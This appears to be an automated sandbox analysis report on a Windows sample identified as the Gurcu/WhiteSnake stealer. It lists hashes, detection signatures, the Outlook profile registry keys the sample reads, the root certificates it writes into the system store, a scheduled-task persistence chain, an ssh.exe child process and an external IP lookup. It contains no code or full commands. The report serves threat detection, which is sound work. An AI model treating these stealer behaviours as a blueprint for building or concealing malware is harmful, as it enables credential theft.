Malware Analysis Report

2024-10-19 06:43

Sample ID 230913-tq9vmagb22
Target Vfd663501e1ac13eb331505b8388e675450.exe
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
Tags
gurcu collection discovery spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5

Threat Level: Known bad

The file Vfd663501e1ac13eb331505b8388e675450.exe was found to be: Known bad.

Malicious Activity Summary

gurcu collection discovery spyware stealer

Detect Gurcu Stealer V3 payload

Gurcu, WhiteSnake

Gurcu family

Reads user/profile data of web browsers

Deletes itself

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Looks up external IP address via web service

Checks installed software on the system

Accesses Microsoft Outlook profiles

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

outlook_win_path

outlook_office_path

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Runs ping.exe

Modifies system certificate store

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-09-13 16:16

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A

Gurcu family

gurcu

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-13 16:16

Reported

2023-09-13 16:20

Platform

win7-20230831-en

Max time kernel

146s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gurcu, WhiteSnake

stealer gurcu

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 2984 wrote to memory of 2332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2984 wrote to memory of 2332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2984 wrote to memory of 2332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2984 wrote to memory of 2016 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2984 wrote to memory of 2016 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2984 wrote to memory of 2016 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2984 wrote to memory of 2772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2984 wrote to memory of 2772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2984 wrote to memory of 2772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2984 wrote to memory of 2880 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2984 wrote to memory of 2880 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2984 wrote to memory of 2880 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2880 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2880 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2880 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2616 wrote to memory of 2492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2616 wrote to memory of 2492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2616 wrote to memory of 2492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2616 wrote to memory of 1824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2616 wrote to memory of 1824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2616 wrote to memory of 1824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2616 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2616 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2616 wrote to memory of 2944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2880 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2880 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2880 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 1428 wrote to memory of 1588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1428 wrote to memory of 1588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1428 wrote to memory of 1588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1428 wrote to memory of 804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1428 wrote to memory of 804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1428 wrote to memory of 804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1428 wrote to memory of 1076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1428 wrote to memory of 1076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1428 wrote to memory of 1076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2880 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2880 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2880 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2880 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2100 wrote to memory of 1808 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2100 wrote to memory of 1808 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2100 wrote to memory of 1808 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 1808 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 1808 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 1808 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 1100 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1100 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1100 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1100 wrote to memory of 2908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1100 wrote to memory of 2908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1100 wrote to memory of 2908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1100 wrote to memory of 552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1100 wrote to memory of 552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1100 wrote to memory of 552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1808 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 1808 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 1808 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2028 wrote to memory of 1600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2028 wrote to memory of 1600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2028 wrote to memory of 1600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

outlook_win_path

Description Indicator Process Target
